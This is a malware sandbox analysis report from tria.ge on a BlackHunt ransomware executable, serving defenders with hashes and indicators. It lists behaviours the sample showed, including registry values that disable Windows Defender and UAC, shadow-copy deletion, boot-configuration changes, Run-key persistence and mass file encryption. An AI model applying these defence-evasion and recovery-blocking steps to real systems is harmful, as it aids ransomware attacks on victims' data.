Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 23:57
Static task
static1
Behavioral task
behavioral1
Sample
81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe
Resource
win10v2004-20231222-en
General
-
Target
81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe
-
Size
707KB
-
MD5
0edcf5f76f745caca8a6f13c321bcdb0
-
SHA1
8e3cc203868fd92f4dc1d8f7dea4e8b39145e179
-
SHA256
81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8
-
SHA512
bd01c86b645b85a2cea2614796ef3dfbc170eb06eafe934ac1d131c76e58f92a1e365ff507cd9ba77572aff04bd7316c3546cd4191ed428c7850e134e74299a0
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1n8mvnh:6uaTmkZJ+naie5OTamgEoKxLWuYh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1064 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2724 bcdedit.exe 536 bcdedit.exe -
Renames multiple (2889) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 1952 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\Z: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Y: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\U: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\Q: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\K: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\X: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\T: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\I: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\H: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\W: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\P: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\G: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\M: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\R: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\S: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\V: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\N: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\O: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\A: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\L: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\J: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\B: 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened (read-only) \??\F: vssadmin.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#BlackHunt_Private.key 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_zh_4.4.0.v20140623020002.jar 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\vlc.mo 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_output\#BlackHunt_ReadMe.txt 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationRight_ButtonGraphic.png 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#BlackHunt_ReadMe.txt 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#BlackHunt_ReadMe.txt 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToNotesBackground_PAL.wmv 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\#BlackHunt_ReadMe.txt 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\#BlackHunt_ReadMe.txt 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor_1.0.300.v20131211-1531.jar 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\#BlackHunt_ReadMe.txt 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sa.xml 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_zh_CN.jar 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Ushuaia 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Tunis 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Puerto_Rico 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\#BlackHunt_ReadMe.hta 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\#BlackHunt_ReadMe.hta 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\acro20.lng 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\#BlackHunt_Private.key 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\LICENSE 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme_0.9.300.v20140424-2042.jar 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Monterrey 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\#BlackHunt_ReadMe.txt 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_ButtonGraphic.png 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\#BlackHunt_Private.key 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_ja_4.4.0.v20140623020002.jar 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsScenesBackground_PAL.wmv 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\#BlackHunt_Private.key 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\Monticello 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#BlackHunt_ReadMe.txt 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Iqaluit 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Macquarie 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\#BlackHunt_ReadMe.hta 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\#BlackHunt_Private.key 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-fallback.jar 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_zh_CN.jar 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\#BlackHunt_Private.key 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui_2.3.0.v20140404-1657.jar 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\#BlackHunt_ReadMe.hta 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#BlackHunt_ReadMe.txt 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\7-Zip\Lang\gu.txt 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.events_3.0.0.draft20060413_v201105210656.jar 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\#BlackHunt_Private.key 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Majuro 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\#BlackHunt_ReadMe.txt 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox_1.0.500.v20131211-1531.jar 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs.xml 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe File created C:\Program Files\DVD Maker\fr-FR\#BlackHunt_ReadMe.hta 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 936 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 792 vssadmin.exe 572 vssadmin.exe 2544 vssadmin.exe 2604 vssadmin.exe 2652 vssadmin.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe Token: SeRestorePrivilege 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe Token: SeBackupPrivilege 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe Token: SeTakeOwnershipPrivilege 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe Token: SeAuditPrivilege 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe Token: SeSecurityPrivilege 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe Token: SeIncBasePriorityPrivilege 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe Token: SeBackupPrivilege 1580 vssvc.exe Token: SeRestorePrivilege 1580 vssvc.exe Token: SeAuditPrivilege 1580 vssvc.exe Token: SeBackupPrivilege 1260 wbengine.exe Token: SeRestorePrivilege 1260 wbengine.exe Token: SeSecurityPrivilege 1260 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2680 wrote to memory of 2824 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 30 PID 2680 wrote to memory of 2824 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 30 PID 2680 wrote to memory of 2824 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 30 PID 2680 wrote to memory of 2824 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 30 PID 2680 wrote to memory of 2580 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 32 PID 2680 wrote to memory of 2580 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 32 PID 2680 wrote to memory of 2580 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 32 PID 2680 wrote to memory of 2580 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 32 PID 2824 wrote to memory of 2172 2824 cmd.exe 33 PID 2824 wrote to memory of 2172 2824 cmd.exe 33 PID 2824 wrote to memory of 2172 2824 cmd.exe 33 PID 2680 wrote to memory of 2712 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 35 PID 2680 wrote to memory of 2712 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 35 PID 2680 wrote to memory of 2712 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 35 PID 2680 wrote to memory of 2712 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 35 PID 2680 wrote to memory of 1940 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 37 PID 2680 wrote to memory of 1940 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 37 PID 2680 wrote to memory of 1940 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 37 PID 2680 wrote to memory of 1940 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 37 PID 2680 wrote to memory of 2556 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 39 PID 2680 wrote to memory of 2556 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 39 PID 2680 wrote to memory of 2556 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 39 PID 2680 wrote to memory of 2556 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 39 PID 2712 wrote to memory of 2708 2712 cmd.exe 41 PID 2712 wrote to memory of 2708 2712 cmd.exe 41 PID 2712 wrote to memory of 2708 2712 cmd.exe 41 PID 2580 wrote to memory of 3004 2580 cmd.exe 42 PID 2580 wrote to memory of 3004 2580 cmd.exe 42 PID 2580 wrote to memory of 3004 2580 cmd.exe 42 PID 1940 wrote to memory of 3008 1940 cmd.exe 140 PID 1940 wrote to memory of 3008 1940 cmd.exe 140 PID 1940 wrote to memory of 3008 1940 cmd.exe 140 PID 2556 wrote to memory of 2736 2556 cmd.exe 44 PID 2556 wrote to memory of 2736 2556 cmd.exe 44 PID 2556 wrote to memory of 2736 2556 cmd.exe 44 PID 2680 wrote to memory of 2296 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 45 PID 2680 wrote to memory of 2296 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 45 PID 2680 wrote to memory of 2296 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 45 PID 2680 wrote to memory of 2296 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 45 PID 2680 wrote to memory of 592 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 47 PID 2680 wrote to memory of 592 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 47 PID 2680 wrote to memory of 592 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 47 PID 2680 wrote to memory of 592 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 47 PID 2680 wrote to memory of 728 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 49 PID 2680 wrote to memory of 728 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 49 PID 2680 wrote to memory of 728 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 49 PID 2680 wrote to memory of 728 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 49 PID 2680 wrote to memory of 2040 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 51 PID 2680 wrote to memory of 2040 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 51 PID 2680 wrote to memory of 2040 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 51 PID 2680 wrote to memory of 2040 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 51 PID 2680 wrote to memory of 688 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 53 PID 2680 wrote to memory of 688 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 53 PID 2680 wrote to memory of 688 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 53 PID 2680 wrote to memory of 688 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 53 PID 2296 wrote to memory of 1008 2296 cmd.exe 55 PID 2296 wrote to memory of 1008 2296 cmd.exe 55 PID 2296 wrote to memory of 1008 2296 cmd.exe 55 PID 2680 wrote to memory of 1640 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 56 PID 2680 wrote to memory of 1640 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 56 PID 2680 wrote to memory of 1640 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 56 PID 2680 wrote to memory of 1640 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 56 PID 2680 wrote to memory of 1408 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 57 PID 2680 wrote to memory of 1408 2680 81ad14defcf93d087ed52ff2cb26d7fecfe158badf3514a23f509fa41f78c9c8.exe 57 -
System policy modification 1 TTPs 3 IoCs
